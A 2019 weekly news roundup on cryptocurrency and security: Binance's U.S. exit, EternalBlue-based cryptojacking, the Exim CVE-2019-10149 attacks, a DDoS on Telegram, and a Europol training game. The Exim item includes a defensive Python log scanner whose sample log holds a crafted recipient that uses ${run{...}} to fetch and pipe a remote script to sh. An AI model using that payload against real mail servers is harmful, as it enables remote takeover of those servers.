Last Week In Blockchain and CyberSecurity News - June 18, 2019

Binance to Close U.S. Trading in 86 Days 

Binance, the largest cryptocurrency exchange by volume, has announced that after September 12, 2019, U.S. users will no longer be able to trade on the platform. According to the exchange’s updated terms of service, the company “is unable to provide services to any U.S. person,” and “users who are not in accordance with Binance’s Terms of Use will continue to have access to their wallets and funds, but will no longer be able to trade or deposit on Binance.com.” 

Roughly 15 percent of Binance’s traffic comes from U.S. customers. The exchange also announced that its new Binance.US platform is undergoing development and will most likely be the only Binance platform available for U.S. crypto enthusiasts.  

As with most U.S. cryptocurrency exchanges, the upcoming U.S. platform will most likely require strict identity verification to comply with local laws and regulations. Binance also asserts that the new platform will have a look and feel similar to the original exchange. 

Read more here

Hackers Infect Businesses with CryptoMiners Using NSA Leaked Tools

Researchers have discovered an ongoing cryptojacking campaign that uses the NSA-developed EternalBlue and EternalChampion SMB exploits to deploy XMRig Monero miners. Microsoft patched the SMBv1 flaws these exploits target back in 2017 (the MS17-010 update), yet many devices remain unpatched. Cybercriminals have taken advantage of these vulnerable machines and are targeting devices around the world.  

Trend Micro researchers state that "businesses across a wide range of industries, including education, communication and media, banking, manufacturing, and technology" are being targeted in these attacks, with the bad actors focusing on victims who use "obsolete or unpatched software."  

Using a “shotgun” approach, the attackers attempt to compromise any vulnerable machine they can find rather than selecting specific victims. EternalBlue and EternalChampion are exploits for a serious SMBv1 weakness, and as with all vulnerabilities, it is critical to keep your devices up to date with the latest patches and to disable SMBv1 where it is not needed. 

Read more here

Millions of Exim Mail Servers Are Currently Under Attack

A critical vulnerability affecting versions 4.87 to 4.91 of the Exim mail transfer agent (MTA) allows “remote attackers to execute arbitrary commands on mail servers for some non-default server configurations.” According to security researchers, attackers have been using the flaw to gain persistent root access to many vulnerable machines by installing their own SSH key for the root account. The vulnerability, CVE-2019-10149, was dubbed "The Return of the WIZard" by Qualys, which discovered it.  

A Shodan search conducted by BleepingComputer earlier this month showed that “vulnerable versions of Exim were running on more than 4,800,000 machines, with roughly 588,000 servers having already installed the patched Exim 4.92 release.” A more recent scan shows that “over 3,680,000 servers are running a vulnerable version of Exim, while the number of patched machines has increased to 1,765,293.”  

Threat actors are mass-exploiting vulnerable mail servers and, after the initial compromise, fetching a Bash script from a Tor hidden service “(an7kmd2wp4xo7hpr) via tor2web 'routing' services.” The bug lives in the deliver_message() function in src/deliver.c and stems from improper validation of the recipient address: in affected configurations the local part of a crafted recipient is passed through Exim’s string expansion, which is what turns a malformed address into command execution. Administrators should upgrade Exim to version 4.92 or later.  
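Two checks a mail administrator would want after reading the above, as an added example that is not part of the original article or of the Exim project: one parses the version string from `exim -bV` output and compares it with the affected range, the other scans log lines for Exim string-expansion items (such as `${run{`) appearing where a recipient address should be. The `exim -bV` line and the log lines below are constructed samples in the style of Exim’s output, not real captures, and the `${run{` pattern is the expansion item the advisory describes being abused; the function names are this example’s own.

```python
"""Checks for CVE-2019-10149 (Exim 4.87 - 4.91).

Added example, not code from the original article or from the Exim project.
Assumptions: `exim -bV` output starts "Exim version X.YY ..." (stock Exim);
the sample version string and log lines below are constructed, not captured.
"""
import re
from typing import List, Optional, Tuple

VULNERABLE_MIN = (4, 87)   # first affected release per the advisory
VULNERABLE_MAX = (4, 91)   # last affected release; 4.92 carries the fix

_VERSION_RE = re.compile(r"Exim version (\d+)\.(\d+)")

# Exim string-expansion items that execute code or read files when an
# attacker controls the string being expanded, e.g. ${run{/bin/sh -c ...}}.
_EXPANSION_RE = re.compile(r"\$\{(run|readfile|readsocket|perl)\{", re.IGNORECASE)


def parse_exim_version(bv_output: str) -> Optional[Tuple[int, int]]:
    """Extract (major, minor) from `exim -bV` output, or None if not found."""
    m = _VERSION_RE.search(bv_output)
    if not m:
        return None
    return int(m.group(1)), int(m.group(2))


def version_is_affected(version: Tuple[int, int]) -> bool:
    """True when the upstream version number is inside the affected range.

    Caveat: distributions often backport the fix without changing the
    version string, so True means "check the package changelog", not
    "definitely vulnerable"; False for 4.92+ means the upstream fix is in.
    """
    return VULNERABLE_MIN <= version <= VULNERABLE_MAX


def suspicious_recipients(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_number, expansion_item) for every log line that carries
    an Exim expansion item. No legitimate recipient address contains
    `${run{`, so each hit deserves a closer look."""
    hits = []
    for n, line in enumerate(log_lines, 1):
        m = _EXPANSION_RE.search(line)
        if m:
            hits.append((n, m.group(1).lower()))
    return hits


# Constructed sample data (not real captures); addresses use RFC 5737 ranges.
SAMPLE_BV = "Exim version 4.91 #1 built 12-Jan-2019 14:03:52\nCopyright (c) ..."

SAMPLE_LOG = [
    "2019-06-10 01:02:03 1hZ0aa-0001ab-Cd <= alice@example.org H=(mail.example.org) [203.0.113.5] P=esmtp S=1234",
    "2019-06-10 01:02:04 1hZ0aa-0001ab-Cd => bob <bob@example.net> R=local_user T=local_delivery",
    "2019-06-10 01:05:17 1hZ0ab-0001ac-Ef <= mallory@example.com H=[198.51.100.7] for ${run{/bin/sh -c \"wget -O - http://192.0.2.10/x | sh\"}}@localhost",
    "2019-06-10 01:05:18 1hZ0ab-0001ac-Ef ** ${run{/bin/sh -c \"...\"}}@localhost: Unrouteable address",
]

if __name__ == "__main__":
    ver = parse_exim_version(SAMPLE_BV)
    state = "unknown" if ver is None else str(version_is_affected(ver))
    print("Exim version: %s, in affected range: %s" % (ver, state))
    for n, item in suspicious_recipients(SAMPLE_LOG):
        print("line %d: expansion item ${%s{...}} in recipient field" % (n, item))
```

In practice you would feed `parse_exim_version` the real output of `exim -bV` and `suspicious_recipients` the lines of your mainlog (for example /var/log/exim4/mainlog on Debian-based systems). Because distribution packages backport fixes without bumping the version, treat a hit from the version check as a prompt to verify the package changelog, and treat any hit from the log scan as an indicator of attempted or successful exploitation regardless of version.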

Get more information here

Telegram CEO Fingers China State Actors for DDoS Attack 

Telegram experienced a “powerful” distributed denial of service (DDoS) attack on Wednesday, causing connection problems for its users. Telegram founder and CEO Pavel Durov later tweeted that much of the traffic which hit the company's servers originated from Chinese IP addresses. Durov went into further detail, stating that the “DDoS attack coincided in time with protests in Hong Kong.” 

Security firms detected numerous attacks against Telegram “sourced from more than 100 countries” during the time frame in question. However, source-country data should be treated with caution: in attacks like the one Telegram experienced, “it is common practice for attackers to use spoofed source IP addresses to conceal their own infrastructure.”   

The first attack against Telegram lasted over 16 hours and peaked at more than 350 Gbps and 150 million packets per second. The second attack lasted around six hours with a bandwidth of more than 120 Gbps. At the time of writing, Telegram appears to have stabilized its service. 

Read more here

Europol Developing ‘Game’ to Teach Officers How to Trace Cryptocurrency

European law enforcement will soon be training officers on how to trace and investigate illicit uses of digital currencies through a game specifically created for the task. The game has been developed in collaboration with CENTRIC (Centre of Excellence in Terrorism, Resilience, Intelligence and Organized Crime Research) and is labeled the “cryptocurrency-tracing serious game.”  

It aims to provide law enforcement officers hands-on training for tracing cryptocurrencies and provides best practices when undertaking cryptocurrency-related investigations. The game is set to launch in October and will be revealed at the seventh Europol-INTERPOL Cybercrime conference. 

Read more here